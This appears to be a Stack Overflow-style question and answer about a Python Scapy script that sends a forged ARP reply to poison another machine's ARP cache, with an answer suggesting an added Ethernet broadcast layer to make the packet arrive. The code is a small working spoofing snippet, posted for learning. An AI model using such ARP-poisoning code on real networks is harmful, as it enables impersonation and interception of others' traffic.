# Arp Packet sent using Python 3 Scapy not reaching destination

Tags: python-3.x, scapy, arp

I am trying to do a simple arp cache poisoning on my other machine for learning purposes using the python3 version of scapy. The code I am using is the following:

```
from scapy.all import *

arp = ARP()
arp.op = 2
arp.psrc = '192.168.0.15' #computer I want to impersonate
arp.pdst = '192.168.0.5' #computer I want to send arp packet too
arp.hwsrc = 'ac:bc:32:c6:49:20' #my mac
arp.hwdst = 'ac:bc:32:c6:12:90' #mac of computer I want to poison

sendp(arp,iface = 'en0')
```

I get the following output when I run this program:

```
WARNING: Could not load module netifaces: No module named 'netifaces'
.
Sent 1 packets.
```

I did not run this program with sudo, and I am sure en0 is the correct interface. However, when I run tshark on the computer with ip = **192.168.0.5**, the arp packet I sent does not appear. Could someone please tell me what mistake I made which caused the packet to not reach the target machine.

Answer (score 0):

I think you also need to define the Ether layer.  Could you try changing `arp = ARP()` to `arp = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP()`? Setting dst to :ff:ff:ff:ff:ff indicates Broadcast meaning it will be sent to all hosts.